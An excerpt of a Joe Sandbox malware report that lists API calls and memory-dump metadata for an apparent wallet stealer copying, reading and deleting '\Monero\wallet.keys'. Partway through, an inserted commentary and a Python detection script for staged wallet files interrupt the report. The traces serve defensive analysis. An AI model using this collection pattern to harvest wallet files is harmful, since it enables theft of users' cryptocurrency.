                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 4965bdd97b2b944a08653b76b5e82f2166eeb650c4085757e882dbe225f09827
                        • Instruction ID: dd2e4b8950982f64e47fe174cc0cb043f1b175dbd02614912b69147251360279
                        • Opcode Fuzzy Hash: 4965bdd97b2b944a08653b76b5e82f2166eeb650c4085757e882dbe225f09827
                        • Instruction Fuzzy Hash: 42019375500208FFCB48DFECC998EAE7BB9FF48364F148548F9099B245C671AA40DB92
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005C12B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C12BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005C12D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005C12F5
                        • RegCloseKey.ADVAPI32(?), ref: 005C12FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 79bcacca3e51c10bf4c45d03710488999256c66979ee25e5f7978a0a0c377d00
                        • Instruction ID: 55e46bcd4a91d7d53ee4978c1c7e7466391920c6cd10f74d337f8f0f3c9483d3
                        • Opcode Fuzzy Hash: 79bcacca3e51c10bf4c45d03710488999256c66979ee25e5f7978a0a0c377d00
                        • Instruction Fuzzy Hash: 8D01E1B9A40308BFDB44DFE4DC59FAEB7B8FB48701F108159FA0597280D6759A018F51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 66463c4071749583436f1624d52c50e6144a82a268ab1829b8137e9e1dd583a8
                        • Instruction ID: 24fedc2be92b15d3965a72d9ef0e090fc084b20f7ccefb6d0df009a3eda0b360
                        • Opcode Fuzzy Hash: 66463c4071749583436f1624d52c50e6144a82a268ab1829b8137e9e1dd583a8
                        • Instruction Fuzzy Hash: 2641087150075D5EDB318B288D94FFB7FF8BB45704F1444EBE98A86282D271AA44DF60
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 005D6663
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D6726
                        • ExitProcess.KERNEL32 ref: 005D6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 01b6ccdfd04ac4a2f251fee4f2195cda0091000ee339a9e14bb15dfa2c97642c
                        • Instruction ID: 2a8bae0ba1b9087861ca2903c16e47724f1448824f36f4f2be23d2db58194fb3
                        • Opcode Fuzzy Hash: 01b6ccdfd04ac4a2f251fee4f2195cda0091000ee339a9e14bb15dfa2c97642c
                        • Instruction Fuzzy Hash: 273152B1C012189BDB64EB94DC95FDE7B78BF44300F40419AF21966291DF746B48CF5A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,005E0E28,00000000,?), ref: 005D882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D8836
                        • wsprintfA.USER32 ref: 005D8850
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: c2213505fb22fc4e736e8338ac8f1e02ac50f6d76c7842c2e9bfb63b8eb24066
                        • Instruction ID: df8ba11e05c9214bd9024fedcef41c1185c420715fece86bde1335fa5a71f6ad
                        • Opcode Fuzzy Hash: c2213505fb22fc4e736e8338ac8f1e02ac50f6d76c7842c2e9bfb63b8eb24066
                        • Instruction Fuzzy Hash: 6B2112B1A40308AFDB58DF98DD49FAEBBB8FB48711F104519F605A7380C7799901CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,005D951E,00000000), ref: 005D8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D8D62
                        • wsprintfW.USER32 ref: 005D8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 6951656a0c47666c6e93c4af922b9e3d8c4d4d701b43d1148c909650b615c328
                        • Instruction ID: e413b1988b3cac9bf790f3b3a223d0ad18892b36f7b5f89c0dd9688680a9b32e
                        • Opcode Fuzzy Hash: 6951656a0c47666c6e93c4af922b9e3d8c4d4d701b43d1148c909650b615c328
                        • Instruction Fuzzy Hash: E3E0ECB5A44308BBD758DBA4DD0AE697BB8FB44702F0081A8FD4997280DA719E109B96
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CA2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 005CA3FF
                        • lstrlen.KERNEL32(00000000), ref: 005CA6BC
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 005CA743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 8ef17bc17e15ab6adcc017614cd85ea06cfe3a851ff6e7a345e3a4d1d0c0cf2b
                        • Instruction ID: e0103afd06c0eba531af8699678243033941a2c2ef3cecdf100df70635c64f05
                        • Opcode Fuzzy Hash: 8ef17bc17e15ab6adcc017614cd85ea06cfe3a851ff6e7a345e3a4d1d0c0cf2b
                        • Instruction Fuzzy Hash: 60E122728101499ACB18FBA8DC9AEEF7738BF94300F50815BF51772191EF306A49DB66
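This function and the near-identical one that follows (CopyFileA with bFailIfExists = FALSE, lstrlen on the result, then DeleteFileA, with `\Monero\wallet.keys` among the strings reached through the path-building subcalls) read as a stealer's collection step: copy a wallet file to a staging location, read it, and remove the copy. The Python below is an added detection example written for this report, not code from the report or the sample. It assumes Sysmon-style FileCreate/FileDelete events (timestamp, pid, image, path) and correlates a create followed by a delete of the same wallet-file copy, by the same process, outside the wallet's own directory and within a short window. Only `wallet.keys` is taken from the report; the sample event stream, the process names and the staging-directory pattern are constructed.

```python
"""Correlate file events to catch wallet files copied out and deleted again.

Added example (not from the sandbox report). It assumes Sysmon-style
FileCreate / FileDelete events with a timestamp, pid, image and path, and
reads the report's CopyFileA -> DeleteFileA sequence (with \\Monero\\wallet.keys
among the referenced strings) as copy-to-staging followed by cleanup.
"""
import re

# File names worth tracking. 'wallet.keys' comes from the report; extend with
# the artefacts of the wallets deployed in your environment (assumption).
WALLET_FILE_NAMES = {"wallet.keys"}
# Creates inside the wallet's own directory are normal wallet activity.
WALLET_DIR_RE = re.compile(r"\\monero\\", re.I)
# Where a stealer typically parks its copy (assumption, tune per environment).
STAGING_DIR_RE = re.compile(r"\\(?:temp|tmp)\\", re.I)


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def find_staged_wallet_files(events: list, window_s: float = 30.0) -> list:
    """One hit per (pid, path) where a process created a copy of a wallet file
    outside the wallet directory and deleted it again within window_s seconds."""
    pending = {}          # (pid, normalised path) -> FileCreate event
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        path = _norm(ev["path"])
        name = path.rsplit("\\", 1)[-1]
        if name not in WALLET_FILE_NAMES or WALLET_DIR_RE.search(path):
            continue
        key = (ev["pid"], path)
        if ev["event"] == "FileCreate":
            pending[key] = ev
        elif ev["event"] == "FileDelete" and key in pending:
            created = pending.pop(key)
            dwell = ev["ts"] - created["ts"]
            if dwell <= window_s:
                hits.append({"pid": ev["pid"], "image": ev["image"], "path": ev["path"],
                             "dwell_s": round(dwell, 3),
                             "staged_in_temp": bool(STAGING_DIR_RE.search(path))})
    return hits


# Constructed sample stream: a stealer (pid 4120) stages and removes a wallet
# copy; the wallet GUI (pid 2210) writes its own file in place; an unrelated
# temp file and a backup copy deleted much later are not flagged.
SAMPLE_FILE_EVENTS = [
    {"ts": 50.0,  "event": "FileCreate", "pid": 2210, "image": "C:\\Program Files\\Monero\\monero-wallet-gui.exe",
     "path": "C:\\Users\\user\\Documents\\Monero\\wallet.keys"},
    {"ts": 100.0, "event": "FileCreate", "pid": 4120, "image": "C:\\Users\\user\\Desktop\\file.exe",
     "path": "C:\\Users\\user\\AppData\\Local\\Temp\\wallet.keys"},
    {"ts": 100.2, "event": "FileCreate", "pid": 4120, "image": "C:\\Users\\user\\Desktop\\file.exe",
     "path": "C:\\Users\\user\\AppData\\Local\\Temp\\cache.tmp"},
    {"ts": 100.8, "event": "FileDelete", "pid": 4120, "image": "C:\\Users\\user\\Desktop\\file.exe",
     "path": "C:\\Users\\user\\AppData\\Local\\Temp\\wallet.keys"},
    {"ts": 101.0, "event": "FileDelete", "pid": 4120, "image": "C:\\Users\\user\\Desktop\\file.exe",
     "path": "C:\\Users\\user\\AppData\\Local\\Temp\\cache.tmp"},
    {"ts": 200.0, "event": "FileCreate", "pid": 3300, "image": "C:\\Tools\\backup.exe",
     "path": "D:\\Backups\\wallet.keys"},
    {"ts": 900.0, "event": "FileDelete", "pid": 3300, "image": "C:\\Tools\\backup.exe",
     "path": "D:\\Backups\\wallet.keys"},
]

if __name__ == "__main__":
    for h in find_staged_wallet_files(SAMPLE_FILE_EVENTS):
        print(f"pid {h['pid']} ({h['image']}) staged {h['path']} for {h['dwell_s']}s")
```

The window is the knob that separates a stealer's sub-second copy/read/delete from legitimate tooling that also moves wallet files around: the constructed backup copy in the stream is only flagged when the window is widened far beyond what collection code needs. Because CopyFileA is called with bFailIfExists = FALSE, an existing copy is overwritten silently, so matching on the create event rather than on a "new file" heuristic is the right choice.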
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CD481
                        • lstrlen.KERNEL32(00000000), ref: 005CD698
                        • lstrlen.KERNEL32(00000000), ref: 005CD6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 005CD72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 22971f7b7950f2d202f55995b2f70245c45804e142da7200e3e29610422d14fc
                        • Instruction ID: 6e06ea38c9242c5be64f65924fa99a5b12f97aa0aec289f78b3421ffb7118c0c
                        • Opcode Fuzzy Hash: 22971f7b7950f2d202f55995b2f70245c45804e142da7200e3e29610422d14fc
                        • Instruction Fuzzy Hash: FF9146728101459BCB18FBA8DC9AEEF7738BF94300F50412BF51762291EF346A49DB66
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CD801
                        • lstrlen.KERNEL32(00000000), ref: 005CD99F
                        • lstrlen.KERNEL32(00000000), ref: 005CD9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 005CDA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: e14ead1eb7d8d05cf59b3a6daf69b74665efaf778e63b05525df37409e0094e3
                        • Instruction ID: 1a0541aadbceca470783b25ceebc46269355aa75f648706b4e9d4e68bcdb2a43
                        • Opcode Fuzzy Hash: e14ead1eb7d8d05cf59b3a6daf69b74665efaf778e63b05525df37409e0094e3
                        • Instruction Fuzzy Hash: 2F8115718101559BCB18FBA8DC59EEF7B38BF94300F40411BF407A6291EF346A49DB66
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
